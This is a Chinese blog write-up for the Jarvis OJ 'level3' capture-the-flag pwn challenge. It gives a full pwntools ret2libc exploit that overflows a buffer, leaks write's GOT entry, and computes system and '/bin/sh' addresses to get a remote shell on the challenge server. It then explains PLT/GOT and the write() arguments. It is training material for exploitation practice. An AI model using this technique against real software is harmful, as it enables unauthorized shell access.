joj level 3 wp

最新推荐文章于 2021-08-16 15:37:16 发布
最新推荐文章于 2021-08-16 15:37:16 发布
阅读量124 收藏
点赞数
分类专栏: pwn wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35927490/article/details/103224311
版权

思路:标准的 ret2libc,先通过 rop 控制 puts 出某个 GOT 中的地址以找到 libc 的基址,有了 libc 的基地址后,libc 中的所有函数和字符串的地址就知道了,构造一个 system(“/bin/sh”) 的函数调用栈即可

from pwn import *
#conn=process(’./level3’)
conn=remote(“pwn2.jarvisoj.com”,“9879”)
libc=ELF(’./libc-2.19.so’)
e=ELF(’./level3’)
pad=0x88+0x4 #buf长度为0x88 + 偏移地址0x4
vulfun_addr=0x0804844B #子程序位置
write_plt=e.symbols[‘write’] #获取write函数地址
write_got=e.got[‘write’] #获取write got表中地址

payload1=‘A’*pad+p32(write_plt)+p32(vulfun_addr)+p32(1)+p32(write_got)+p32(4)
#覆盖前面的空间和ebp,然后执行write函数,设write函数的返回地址为vulnerable函数,然后给write函数传入三个参数(1,write的地址,4)
conn.recvuntil(“Input:\n”)
#接受"input:\n"
conn.sendline(payload1)
#传入payload
write_addr=u32(conn.recv(4))
##获得泄露的write()的地址,拦截前4个字节;
#calculate the system_address in memory
libc_write=libc.symbols[‘write’] #获取.so文件中write地址
libc_system=libc.symbols[‘system’]#获取.so文件中system地址
libc_sh=libc.search(’/bin/sh’).next()
#在.so文件搜索/bin/sh 地址
system_addr=write_addr-libc_write+libc_system
sh_addr=write_addr-libc_write+libc_sh

payload2=‘A’*pad+“BBBB”+p32(system_addr)+“dead”+p32(sh_addr)
#system初始地址,传入初始化值,值为4个字符,在传入/bin/sh地址.
conn.sendline(payload2)
conn.interactive()

通过获得有GOT/PLT表项的函数write()的真实地址以及.so文件中的write()和system函数和"/bin/sh",字符串偏移量与程序运行时三者的运行时(真实)地址偏移量相同的关系,通过write()的真实地址+相等偏移量获得system函数的调用地址和"/bin/sh" 字符串的地址.
write()在32位下传值为 write(1,write_got,4);
write()在64位下传值为 write(1,write_got,8);

fd: 文件描述符[1表示写到标准输出,即屏幕]
buf: 指定的缓冲区,即指针,指向一段内存单元;
nbyte: 要写入文件指定的字节数;
返回值: 写入文档的字节数(成功),-1(出错);
当写到nbyte的字节限制时,就write()结束了.

程序中为plt表,.so文件中为got表, plt表中存放的是函数在got表中该项的地址,got表存放的是函数在内存中真实地址, plt[write]指向got[write], got[write]指向write函数在内存中地址.
plt表在服务器和客户机是一样的,不一样的是函数在内存中的地址.程序运行后加载动态库,把动态库中相应的函数地址填入GOT表.
libc文件中不同函数,数据之间的偏移量是一样的.

鬼桑
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf 抓捕赵德汉_第三届网络空间安全技术大赛WriteUp(cstc2017)
weixin_33304686的博客
12-30 773
web 1 签到题1.看源码发现是php隐士转换直接 Username=QNKCDZO,password=240610708 ,得到下一个地址 http://117.34.111.15:84/json.php2.继续右键看源码2.继续右键看源码QQ20170418-131112.png (32.74 KB, 下载次数: 269)2017-4-18 13:15 上传3.又是弱类型Web2 抽奖看到 ...
python socket编程详细介绍
weixin_34112900的博客
12-12 4142
Python 提供了两个基本的 socket 模块。    第一个是 Socket,它提供了标准的 BSD Sockets API。    第二个是 SocketServer, 它提供了服务器中心类,可以简化网络服务器的开发。下面讲的是Socket模块功能1、Socket 类型套接字格式:socket(family,type[,protocal]) 使用给定的地址族、套接字类型、协议编号(默认为0...
BUUCTF刷题(前12道)
像初雪一样自由洒落
04-04 1028
哈哈哈,我又来刷题了,看了下BUUCTF上面的pwn题还真多。。。 test_your_nc ida查看,发现直接执行system,所以,直接交互就可以 //写下简单的脚本 from pwn import * p = remote('node3.buuoj.cn',28213) p.interactive() ...
Blind_pwn之格式化字符串
蚁景网安学院
07-07 991
可能需要提前了解的知识格式化字符串原理&利用got & plt 调用关系程序的一般启动过程原理格式化字符串盲打指的是只给出可交互的 ip 地址与端口,不给出对应的 bin...
关于addr=u32(r.recvuntil(‘\xf7‘)[-4:])的解释
半岛铁盒的博客
04-15 1867
有时候我们写EXP的时候 对于32位文件ROP 在接收函数地址的时候我们 会用到 addr=u32(r.recv(4)) 但这个命令有时候 会失效,接收不到; 这时候就会用到addr=u32(r.recvuntil('\xf7')[-4:]) 这涉及到个debug调试查看context.log_level="debug" 可以看到我们传入的a字符串结束的地方是0x7C,后面跟着的就是我们泄露出来的write函数的地址,我写的意思是从0x7F(这一行末尾), [-4:]即([::-4])往前截取4字节,得到
joj.rar_joj
09-21
如果页面访问序列是P0, P1, P2, P0, P3, P0, P1, P2...,那么使用FIFO算法时,分配2个页面会比分配3个页面有更少的缺页。这是因为分配3个页面时,P0会被频繁地淘汰和重新调入,而分配2个页面时,P0可以一直保留在...
JOJ-jilin-university--acm.rar_joj
09-24
【标题】"JOJ-jilin-university--acm.rar_joj" 提供的是吉林大学JOJ在线判题系统的编程竞赛代码集,主要用于帮助初学者入门。 【描述】中的信息表明,这个压缩包内的代码样例是专门为在JOJ平台上进行编程训练的学生...
JoJ-crx插件
03-27
Etre au courant quand JoJ est en live,策划人semaine et liens vers lesréséauxauxsocioaux Soyez au courant纠结JoJ开始à流光! 现场直播将继续进行。 约翰·奎因·伊斯特·布鲁和克林·德集团的非官方网站 D...
joj acm 部分习题解答
12-15
3. **数学应用**:可能涉及到组合数学、数论、图论等领域的知识,例如计算几何、最优化问题等。 4. **字符串处理**:如模式匹配、字符串操作、正则表达式等。 5. **C++编程技巧**:包括C++标准库的使用、STL(标准...
Joj - Java Version of Java-开源
07-10
3. **代码生成**:有了对象化的 Java 代码表示,Joj 还可以方便地生成新的 Java 源代码。这对于代码自动化生成、重构或者插件开发非常有用。 4. **易于扩展**:作为开源项目,Joj 的设计允许开发者根据需求扩展其...
(pwn) C语言 write函数且使用write函数泄露 libc版本
半岛铁盒的博客
08-16 3747
ssize_t write(int fd,const void*buf,size_t count); 参数说明: fd:是文件描述符(write所对应的是写,即就是1) buf:通常是一个字符串,需要写入的字符串 count:是每次写入的字节数 payload=p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4) r.recvuntil("What is your name?") r.send(payload) ...
BUUCTF-PWN刷题记录-3
weixin_44145820的博客
03-31 845
目录hitcontraining_heapcreator hitcontraining_heapcreator 考虑修改GOT表 在edit函数中可以溢出一个byte 这题需要利用堆重叠的方法,因为free之后会置空,只能利用堆重叠进行重复分配 利用思路如下: 先申请三个heap,其中heap[0]的内容大小为8的奇数倍 使用edit溢出修改heap[1]的chunk的size,把heap[...
python的socket.recv函数陷阱
热门推荐
weixin_34414196的博客
08-04 1万+
目录 前言 一个粘包实验 执行结果 排错思路 解决和总结 前言 惯例练习历史实验,在编写tcp数据流粘包实验的时候,发现一个奇怪的现象。当远程执行的命令返回结果很短的时候可以正常执行,但返回结果很长时,就会发生json解码错误,故将排错和解决方法记录下来。 一个粘包实验 服务端(用函数): import socket import json impo...
level3的wp
wuyvle的博客
02-01 301
level3 用Linux康康,这是个压缩文件啊,解压康康 居然是个libc,有意思 先康康level3,是个32位,没有金丝雀 给了个buf,康康堆栈 可溢出,但是我们发现没有system函数,但是我们有libc 可以通过libc泄露system函数地址,虽然与原文件地址不一样,但是libc的write函数和system函数之间的地址差是一样的 写脚本 #导入pwn模块 from pwn import * #获取远程进程对象 p=remote('111.198.29.45',41496) #获取
栈溢出PWN练习总结
YangLanLing的博客
07-27 1083
Level0 首先拿到题目后,先用虚拟机判断一下文件的类型,有什么保护机制 由图可知,level0这个文件是64位的,没有任何保护机制。再运行一下程序, 拖进IDA后发现,里面有个callsystem函数,所以数据就是从这泄露的。所以编写脚本 from pwn import * p = remote('111.198.29.45',33907) elf = ELF('./le...
conn.recv()参数值设置 缓存_Milvus系统配置项和API参数设置
weixin_30768403的博客
12-21 643
在Milvus官网上有一篇《如何选择索引类型》的文章,介绍了如何根据需要选择索引类型。但是仅仅知道选择索引类型还是不够的。本文针对Milvus 0.6.0版本的几个关键系统配置项以及API参数进行详细说明与测试验证,并给予如何设置的建议。(一)系统配置项 系统配置项是Milvus在启动服务之前进行的参数设置,需要在Milvus docker镜像启动前对server_config.ya...
CTF总结-PWN篇
qq_42747131的博客
05-14 6861
一、通用过程 通过file指令查看二进制文件是32位还是64位,这个影响特别大(涉及参数的传递方式) 通过checksec指令查看可执行文件的保护措施开启情况 运行一下这个可执行文件,了解一些程序运行流程 开始通过pwntools解题 pwntools 二、缓冲区溢出攻击 寻找可以进行攻击的位置 通过cyclic [number] 获得一个长度为number的序列 在攻击处输入上一步获得的序列,查看报错信息 通过cyclic -l [序列] 来判断从第几位开始覆盖的是返回地址 构造payload 构造
ISG pwnme100 poc 学习
Bluish Assassin's Creed
11-21 2113
ISG pwnme100 poc 学习 背景 最近在学习ISG2015比赛的 FlappyPig 的writeup(http://bobao.360.cn/learning/detail/702.html),对其中的pwn比较感兴趣,因此查阅了部分资料后对poc进行了研究。 其中在csdn上海枫的专栏(http://blog.csdn.net/column/details/buffer-ove
vue.runtime.esm.js:4605 [Vue warn]: Error in v-on handler (Promise/async): "AxiosError: Network Error" found in ---> <Jojn> at src/components/jojn.vue <App> at src
最新发布
05-15
这个错误提示是由axios库发出的,它表示在请求时发生了网络错误。可能是由于网络故障或目标服务器无法访问等原因导致的。你可以先检查一下网络连接是否正常,然后再检查请求参数和目标服务器地址是否正确。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值